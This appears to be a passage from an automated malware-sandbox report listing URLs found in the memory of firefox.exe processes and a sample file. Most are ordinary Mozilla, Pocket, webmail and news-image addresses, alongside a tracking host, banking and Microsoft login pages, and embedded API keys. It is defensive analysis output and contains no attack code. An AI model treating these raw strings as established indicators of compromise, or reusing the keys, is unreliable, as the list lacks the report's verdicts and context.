Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.dns.nextdns.io/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f22
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B0152F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/collections/the-jobs-you-didnt-know-existed?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/25-years-later-this-cozy-n64-classic-finally-gets-the-recognition
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/a-magnetic-therapy-for-depression-gains-precision?utm_source=pock
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/an-old-virginia-plantation-a-new-owner-and-a-family-legacy-unveil
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/crunchwrap-supreme?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/do-you-have-a-shadow-side-the-psychology-of-why-we-find-some-peop
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/essential-bike-maintenance-tips-everyone-should-know?utm_source=p
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/here-s-a-list-of-everything-haruki-murakami-has-ever-compared-to-
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/how-to-compost-an-easy-diy-guide?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/how-to-sleep-better-the-4-best-strategies-according-to-the-expert
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/mechanical-movements-of-the-cold-war-how-the-soviets-revolutioniz
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/restaurant-work-can-destroy-your-body-but-it-doesn-t-have-to?utm_
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-beginner-s-guide-to-catching-your-first-fish?utm_source=pocke
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-bizarre-cultural-history-of-saliva?utm_source=pocket-newtab-e
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-first-reviews-of-every-virginia-woolf-novel?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-ideal-vacation-length-for-peak-relaxation-according-to-expert
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-lazarus-heist-how-north-korea-almost-pulled-off-a-billion-dol
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-million-dollar-scammer-and-his-many-mormon-marks?utm_source=p
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-mysterious-case-of-the-f-117-nighthawk-s-flip-down-radar-loca
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-scientific-underpinnings-and-impacts-of-shame?utm_source=pock
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/why-is-my-hair-changing-texture-and-when-should-i-see-a-professio
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/why-there-s-still-no-new-birth-control-for-men?utm_source=pocket-
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hips.hearstapps.com/hmg-prod/images/garmin-race-adaptive-training-rwd060124-669aaf40f0f0d.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.kinja-img.com/image/upload/c_fill
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.natgeofe.com/n/aa2728ac-4a75-4b3e-9163-2b32a66e9d1d/MM100710_230501_00795_16x9.JPG?w=1200
Source: firefox.exe, 00000021.00000003.3167497219.0000016DEA924000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3171125970.0000016DE4874000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ichef.bbci.co.uk/images/ic/480xn/p0jdbybk.jpg.webp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210723597.0000016DEA8E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://images.fastcompany.com/image/upload/f_auto
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2F149349728.v2.pressablecdn.com%2Fwp-co
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fhips.hearstapps.com%2Fhmg-prod%2Fimag
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fi.natgeofe.com%2Fn%2Faa2728ac-4a75-4b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fichef.bbci.co.uk%2Fimages%2Fic%2F480x
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F3c46a6db9
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba2700
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edc
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-c
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fwww.motherjones.com%2Fwp-content%2Fup
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img.pastemagazine.com/wp-content/juploads/2024/07/olympicbeds.jpg
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imgix.bustle.com/uploads/image/2024/7/24/d57cdb8b/quitcooking_social.jpg?w=1200&h=630&fit=cr
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkr4C8afQLY4CHW1plrfCDYftIWHG7kJnEYgFIvxnEnJrNWxnwmH
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/a41b546f-2a45-4575-b7b2-1924b
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.3203254934.0000016DEA83E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200643077.0000016DEE217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000021.00000003.2896043336.0000016DDE44E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://market-trk.com/50/9411?campaign=FF-SOV03-CompareCredit-BoATravel
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://media.wired.com/photos/669ee1db82dcc6be43bb872a/191:100/w_1280
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://money.com/olympic-gold-medals-worth-value/?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3285567535.00000221E1EC0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000002D.00000002.3291688000.0000022B01600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true&authuser=0
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE4983000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://qz.com/travel-agent-millionaires-sienna-charles-jaclyn-india-1851600173?utm_source=pocket-ne
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://s.zkcdn.net/Advertisers/3c46a6db92de457aac08d729b7e553ee.png
